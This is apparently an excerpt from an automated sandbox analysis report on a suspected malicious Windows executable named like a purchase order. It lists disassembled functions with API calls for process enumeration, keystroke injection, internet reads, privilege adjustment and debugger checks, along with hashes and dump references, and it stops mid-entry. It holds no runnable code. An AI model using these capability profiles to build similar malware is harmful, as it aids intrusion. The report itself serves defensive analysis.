                                • Instruction ID: 537a44b064c303331cce422b7ee4cd13fde73b36ce28a5fc3f9f3a82b083f821
                                • Opcode Fuzzy Hash: a280816d2047eeb631aab91fa2114c35197f7463e651139ff1a3ef53474c07a5
                                • Instruction Fuzzy Hash: 77A28070E0061ACBDF25CF58C9807ADB7B2BF54315F2581A9EC25BB285EB709D85CB50
                                Function 001B8298 Relevance: 6.6, APIs: 1, Strings: 3, Instructions: 568stringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?,?,?,00000000), ref: 001B82AA
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: lstrlen
                                • String ID: ($tb!$|
                                • API String ID: 1659193697-4054476356
                                • Opcode ID: dc067b128c26474fc2e6428d154c07469908a0018ff4a3add35fa73cddd85c55
                                • Instruction ID: 7ad4624306908a307f1f2c5d7fae134fb6b9cb67a3fa46e875f93df43a15572f
                                • Opcode Fuzzy Hash: dc067b128c26474fc2e6428d154c07469908a0018ff4a3add35fa73cddd85c55
                                • Instruction Fuzzy Hash: 02322775A00605DFC728DF59C481AAAB7F4FF48B10B15C56EE49ADB3A1EB70E981CB40
                                Function 001DA67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32 ref: 001DA6AC
                                • Process32FirstW.KERNEL32(00000000,?), ref: 001DA6BA
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                • Process32NextW.KERNEL32(00000000,?), ref: 001DA79C
                                • CloseHandle.KERNEL32(00000000), ref: 001DA7AB
                                  • Part of subcall function 0016CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00193303,?), ref: 0016CE8A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                • String ID:
                                • API String ID: 1991900642-0
                                • Opcode ID: 1d9929334f286675705489dbe53c54ac9a37cd7e7a02b11a8ebac314ee852e72
                                • Instruction ID: f79779971db662369d5db8a15bece0f87c69b7aaf9b38d1ac70d47b540af7d7e
                                • Opcode Fuzzy Hash: 1d9929334f286675705489dbe53c54ac9a37cd7e7a02b11a8ebac314ee852e72
                                • Instruction Fuzzy Hash: 31516C71508300EFD710EF24D886A6BBBE8FF99754F40491DF9999B252EB70D908CB92
                                Function 001BAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                Download Yara Rule
                                APIs
                                • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 001BAAAC
                                • SetKeyboardState.USER32(00000080), ref: 001BAAC8
                                • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 001BAB36
                                • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 001BAB88
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: KeyboardState$InputMessagePostSend
                                • String ID:
                                • API String ID: 432972143-0
                                • Opcode ID: f1c9dc47794938a000995dbf99f6b7e781b72d45a494111d35cd1099ae68ba98
                                • Instruction ID: eba3e0e6f83b455b085a864aa64c0a34aea105aa19d058d50d192e65d19810a2
                                • Opcode Fuzzy Hash: f1c9dc47794938a000995dbf99f6b7e781b72d45a494111d35cd1099ae68ba98
                                • Instruction Fuzzy Hash: 58313730A80248AEFF35CB65CD45BFE7BAAAF48310F84421AF5A1961D0D3759D85C7A2
                                Function 001CCE44 Relevance: 6.1, APIs: 4, Instructions: 75filenetworkCOMMON
                                Download Yara Rule
                                APIs
                                • InternetReadFile.WININET(?,?,00000400,?), ref: 001CCE89
                                • GetLastError.KERNEL32(?,00000000), ref: 001CCEEA
                                • SetEvent.KERNEL32(?,?,00000000), ref: 001CCEFE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorEventFileInternetLastRead
                                • String ID:
                                • API String ID: 234945975-0
                                • Opcode ID: f2bda7f1f5815093911e0c6cde5d56d7d7f2cdbc154b883f0d9a066105f9a64d
                                • Instruction ID: f3dd7ab47a16324c9a616c4d148f51cfdbc35423217bfa8d4b534f5ebc07753e
                                • Opcode Fuzzy Hash: f2bda7f1f5815093911e0c6cde5d56d7d7f2cdbc154b883f0d9a066105f9a64d
                                • Instruction Fuzzy Hash: 3E21BD719003059BD720DFA5C988FAA7BF8EB61314F10841EE64AD6551E770EE45CBA0
                                Function 001BDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                Download Yara Rule
                                APIs
                                • lstrlenW.KERNEL32(?,00195222), ref: 001BDBCE
                                • GetFileAttributesW.KERNEL32(?), ref: 001BDBDD
                                • FindFirstFileW.KERNEL32(?,?), ref: 001BDBEE
                                • FindClose.KERNEL32(00000000), ref: 001BDBFA
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                • String ID:
                                • API String ID: 2695905019-0
                                • Opcode ID: 8ca1aac5982ec2a1784c3ff525446598cc6e5b3461bb71809edcd7d85cfb7ce7
                                • Instruction ID: c9b63c0114dc520e3fbedca63bea8d9aed94008bfbd053fa7e804c1cc7e91434
                                • Opcode Fuzzy Hash: 8ca1aac5982ec2a1784c3ff525446598cc6e5b3461bb71809edcd7d85cfb7ce7
                                • Instruction Fuzzy Hash: BAF0A0308109109782246BB8AC4E8AE3B6D9F06334B10470AF936C24E0FBB05D9686D5
                                Function 00182622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • IsDebuggerPresent.KERNEL32 ref: 0018271A
                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00182724
                                • UnhandledExceptionFilter.KERNEL32(?), ref: 00182731
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                • String ID:
                                • API String ID: 3906539128-0
                                • Opcode ID: 87c4ecdf8546e1b95c3ea30659d5f79569a847b4fd813c0876e129ec67fcf48b
                                • Instruction ID: 2e0e93659f5268022adf931b90bcf71c4fe7f2d16c43b9cb06fd36b2f5620cf3
                                • Opcode Fuzzy Hash: 87c4ecdf8546e1b95c3ea30659d5f79569a847b4fd813c0876e129ec67fcf48b
                                • Instruction Fuzzy Hash: D031B474951328ABCB21DF64DC8979DB7B8BF18310F5081EAE81CA7261E7309F818F45
                                Function 001C51CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNEL32(00000001), ref: 001C51DA
                                • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 001C5238
                                • SetErrorMode.KERNEL32(00000000), ref: 001C52A1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorMode$DiskFreeSpace
                                • String ID:
                                • API String ID: 1682464887-0
                                • Opcode ID: e8e668b4601b23c38ce0f574e84d22a172d85f3a5361bcd5f7c4d69853ceca44
                                • Instruction ID: 765cc65b53c6edbaf20f4e4f7ae455fe4d61f71e1ba2a6f387c559e3cbd989ca
                                • Opcode Fuzzy Hash: e8e668b4601b23c38ce0f574e84d22a172d85f3a5361bcd5f7c4d69853ceca44
                                • Instruction Fuzzy Hash: 9A310975A00618DFDB00DF94D884EADBBF5FF59314F048099E805AF2A2DB31E85ACB91
                                Function 001B16C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0016FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00170668
                                  • Part of subcall function 0016FDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 00170685
                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 001B170D
                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 001B173A
                                • GetLastError.KERNEL32 ref: 001B174A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                • String ID:
                                • API String ID: 577356006-0
                                • Opcode ID: 94d2036cd7fb16b389652e10f09e4eb6d20296c460d0340bf5f61c74af9be33c
                                • Instruction ID: dc4db161f5a45bd7269fa87509e9129cad179ef4441af2565a9f268150a024c3
                                • Opcode Fuzzy Hash: 94d2036cd7fb16b389652e10f09e4eb6d20296c460d0340bf5f61c74af9be33c
                                • Instruction Fuzzy Hash: 991191B2404304BFD718AF94ECC6DABB7BDEB45714B21852EF45657681EB70BC428B60
                                Function 001BD5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001BD608
                                • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 001BD645
                                • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 001BD650
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseControlCreateDeviceFileHandle
                                • String ID:
                                • API String ID: 33631002-0
                                • Opcode ID: 72fe3e8a5982f03c42408e34d9e3032dc0a07cb69a7ed1a1128890ebd2fb647c
                                • Instruction ID: 7accb0fec2b4bf41894f3732a82e6eabbd09bab834b209508cd83eb0436649da
                                • Opcode Fuzzy Hash: 72fe3e8a5982f03c42408e34d9e3032dc0a07cb69a7ed1a1128890ebd2fb647c
                                • Instruction Fuzzy Hash: 86113C75E05228BBDB148F95AC85FEFBFBCEB45B50F108115F904E7290D7704A058BA1
                                Function 001B1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                Download Yara Rule
                                APIs
                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 001B168C
                                • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 001B16A1
                                • FreeSid.ADVAPI32(?), ref: 001B16B1
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AllocateCheckFreeInitializeMembershipToken
                                • String ID:
                                • API String ID: 3429775523-0
                                • Opcode ID: c6644a2e5a34488b4a3a10b85e61d13284a20a88ecec5c5820418322c17872f2
                                • Instruction ID: f0c3502245d358522e38f40fb83de7eb29c0cabb3634b64058d89c4596c47703
                                • Opcode Fuzzy Hash: c6644a2e5a34488b4a3a10b85e61d13284a20a88ecec5c5820418322c17872f2
                                • Instruction Fuzzy Hash: FDF0F475950309FBDB00DFE49C89AAEBBBCFB08704F504565E501E6181E774AA448A90
                                Function 00174CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32(001828E9,?,00174CBE,001828E9,002188B8,0000000C,00174E15,001828E9,00000002,00000000,?,001828E9), ref: 00174D09
                                • TerminateProcess.KERNEL32(00000000,?,00174CBE,001828E9,002188B8,0000000C,00174E15,001828E9,00000002,00000000,?,001828E9), ref: 00174D10
                                • ExitProcess.KERNEL32 ref: 00174D22
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$CurrentExitTerminate
                                • String ID:
                                • API String ID: 1703294689-0
                                • Opcode ID: dfa6e6311f33323395abbf339abff63f72ffdd7b3eda6dc1f8acb25304a6499f
                                • Instruction ID: 1c807072b102770047d93a06dc622fd4619fab239725dec4ea4504903891d686
                                • Opcode Fuzzy Hash: dfa6e6311f33323395abbf339abff63f72ffdd7b3eda6dc1f8acb25304a6499f
                                • Instruction Fuzzy Hash: 93E0B631000188AFCF21AFD4DD59A583B79FB61781B158014FC599A522DB35EE92CB80
                                Function 0018C2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: /
                                • API String ID: 0-2043925204
                                • Opcode ID: 3d99eddf20e398cf68f501b5538509b71ebcd2f59f290244bf14213dd38aecba
                                • Instruction ID: d3d1ee18ba1b9f84214412e078655f2e0ed3d9bcde84cfab2ddd7157bc629cd6
                                • Opcode Fuzzy Hash: 3d99eddf20e398cf68f501b5538509b71ebcd2f59f290244bf14213dd38aecba
                                • Instruction Fuzzy Hash: 61410876500219ABCB24AFB9DC49EBB7779FB84354F504269F905D7180E7709E818FA0
                                Function 001AD27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                Download Yara Rule
                                APIs
                                • GetUserNameW.ADVAPI32(?,?), ref: 001AD28C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: NameUser
                                • String ID: X64
                                • API String ID: 2645101109-893830106
                                • Opcode ID: 8d96aa1334d777ada449dcaff991e04b4b3da82e6d1f975c5c6701caa68e7455
                                • Instruction ID: da603a9316b1ca49e03ba00c6a7ae9b626bed7a79e83e9d299d45527a55fb86a
                                • Opcode Fuzzy Hash: 8d96aa1334d777ada449dcaff991e04b4b3da82e6d1f975c5c6701caa68e7455
                                • Instruction Fuzzy Hash: E2D0C9B880111DEACB94DB90ECC8DDEB37CBB04305F110152F506A2000DB3095498F50
                                Function 0017CAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                • Instruction ID: 353e45805d69377230ec44f27d0e511099c3c35a3d332279eba0220d56fcbe14
                                • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                • Instruction Fuzzy Hash: 06021B71E002199BDF24CFA9C8906ADFBF1EF58314F25816ED919E7384D731AA418BD4
                                Function 0015CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID:
                                • String ID: Variable is not of type 'Object'.$p#"
                                • API String ID: 0-2226386633
                                • Opcode ID: 6bdeead8a43f5e9f7f093831d8a81d40ce73a18b5db3ac0ed8511956f3e6a3c2
                                • Instruction ID: e6788ab9e68f919d5ae92f26a5c0e20fefbddc94f7d5f6762ae3879121acd0a4
                                • Opcode Fuzzy Hash: 6bdeead8a43f5e9f7f093831d8a81d40ce73a18b5db3ac0ed8511956f3e6a3c2
                                • Instruction Fuzzy Hash: 6B327974900318DFCF19DF94C881AEDB7B5BF1A305F144059E826AF292D775AE49CBA0
                                Function 001C68EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                Download Yara Rule
                                APIs
                                • FindFirstFileW.KERNEL32(?,?), ref: 001C6918
                                • FindClose.KERNEL32(00000000), ref: 001C6961
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Find$CloseFileFirst
                                • String ID:
                                • API String ID: 2295610775-0
                                • Opcode ID: aedafde08dcd7b9990856c0ba85b717a0798850d58ce5772da3595ed1b633e8b
                                • Instruction ID: cb8cebed15263defe83a7d9a38091470666a780f663452734b99ad9b7b08e580
                                • Opcode Fuzzy Hash: aedafde08dcd7b9990856c0ba85b717a0798850d58ce5772da3595ed1b633e8b
                                • Instruction Fuzzy Hash: 8311BE316042019FC710CF69D885E1ABBE1EF98329F04C69DE8698F6A2C730EC45CBD0
                                Function 001C37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,001D4891,?,?,00000035,?), ref: 001C37E4
                                • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,001D4891,?,?,00000035,?), ref: 001C37F4
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorFormatLastMessage
                                • String ID:
                                • API String ID: 3479602957-0
                                • Opcode ID: 929267a09dca4236884481de27772d90db3929d3b47556769a39ceaa1b5beae0
                                • Instruction ID: 0d806c60f141454299a9fe1ae095506f788598809ec2eb0a897d291245ee0e3b
                                • Opcode Fuzzy Hash: 929267a09dca4236884481de27772d90db3929d3b47556769a39ceaa1b5beae0
                                • Instruction Fuzzy Hash: EFF0E5B16043296AEB2017A68C8DFEB7AAEEFC5761F000165F519D2281DA609944C6F0
                                Function 001BB226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 001BB25D
                                • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 001BB270
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
